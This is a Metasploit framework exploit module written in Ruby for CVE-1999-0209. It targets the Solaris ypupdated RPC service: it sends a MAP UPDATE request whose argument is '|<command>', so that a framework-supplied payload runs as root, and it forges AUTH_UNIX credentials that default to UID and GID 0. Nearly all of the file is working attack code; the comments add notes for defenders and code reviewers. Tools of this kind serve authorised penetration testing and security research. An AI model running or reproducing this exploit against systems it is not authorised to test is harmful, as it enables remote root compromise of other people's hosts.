GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/solaris/sunrpc/ypupdated_exec.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'English'
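# Metasploit exploit module for CVE-1999-0209: command injection through the
# ypupdated RPC service (program 100028) on Solaris hosts where ypupdated was
# started with the '-i' option. The MAP UPDATE handler passes its argument to a
# root shell, so a value of the form '|<command>' runs <command> as root.
#
# Defender notes (from the module metadata below): the request is visible in
# host logs (IOC_IN_LOGS) and the module is rated CRASH_SAFE, i.e. it does not
# disturb the service. Not running ypupdated with '-i' removes the condition
# the module depends on.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::SunRPC

  # SunRPC program number, program version and procedure number used for the
  # MAP UPDATE request. These are the values the original module hard-coded
  # as locals inside #exploit.
  YPUPDATED_PROGRAM = 100028
  YPUPDATED_VERSION = 1
  MAP_UPDATE_PROCEDURE = 1

  # Registers module metadata and the three user-settable options:
  # HOSTNAME, UID and GID, which are sent as the AUTH_UNIX credentials.
  #
  # @param info [Hash] metadata merged by the framework via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Solaris ypupdated Command Execution',
        'Description' => %q{
          This exploit targets a weakness in the way the ypupdated RPC
          application uses the command shell when handling a MAP UPDATE
          request. Extra commands may be launched through this command
          shell, which runs as root on the remote host, by passing
          commands in the format '|<command>'.

          Vulnerable systems include Solaris 2.7, 8, 9, and 10, when
          ypupdated is started with the '-i' command-line option.
        },
        'Author' => [ 'I)ruid <druid[at]caughq.org>' ],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '1999-0209'],
          ['OSVDB', '11517'],
          ['BID', '1749'],
        ],
        'Privileged' => true,
        'Platform' => %w[solaris unix],
        'Arch' => ARCH_CMD,
        'Payload' => {
          'Space' => 1024,
          'DisableNops' => true,
          'Compat' => {
            'PayloadType' => 'cmd',
            'RequiredCmd' => 'generic perl telnet'
          }
        },
        'Targets' => [ ['Automatic', {}], ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '1994-12-12',
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS]
        }
      )
    )

    register_options([
      OptString.new('HOSTNAME', [false, 'Remote hostname', 'localhost']),
      OptInt.new('GID', [false, 'GID to emulate', 0]),
      OptInt.new('UID', [false, 'UID to emulate', 0])
    ])
  end

  # Sends one MAP UPDATE request over UDP whose argument is '|<payload>'.
  #
  # Flow: resolve the program through the portmapper (sunrpc_create), attach
  # AUTH_UNIX credentials built from HOSTNAME/UID/GID, XDR-encode the command
  # and call the procedure, then tear the client down.
  #
  # @return [void]
  # @raise anything other than an RPC timeout propagates to the framework
  def exploit
    hostname = datastore['HOSTNAME']

    print_status('Sending PortMap request for ypupdated program')
    sunrpc_create('udp', YPUPDATED_PROGRAM, YPUPDATED_VERSION)

    print_status("Sending MAP UPDATE request with command '#{payload.encoded}'")
    print_status('Waiting for response...')
    # Credentials are taken verbatim from the options; the empty array is the
    # supplementary-GID list.
    sunrpc_authunix(hostname, datastore['UID'], datastore['GID'], [])
    command = "|#{payload.encoded}"
    # NOTE(review): the meaning of the four trailing XDR fields is not
    # documented in this module; they are kept exactly as originally sent.
    msg = Rex::Encoder::XDR.encode(command, 2, 0x78000000, 2, 0x78000000)
    sunrpc_call(MAP_UPDATE_PROCEDURE, msg)

    # NOTE(review): on the timeout path below the client is not destroyed;
    # confirm whether sunrpc_destroy is safe to call from an ensure clause
    # before moving it there.
    sunrpc_destroy

    print_status('No Errors, appears to have succeeded!')
  rescue ::Rex::Proto::SunRPC::RPCTimeout
    # $ERROR_INFO is the exception object, not a String: String#+ on it would
    # raise TypeError inside the rescue and mask the timeout. Interpolation
    # calls #to_s (the exception message) instead.
    print_warning("Warning: #{$ERROR_INFO}")
  end
end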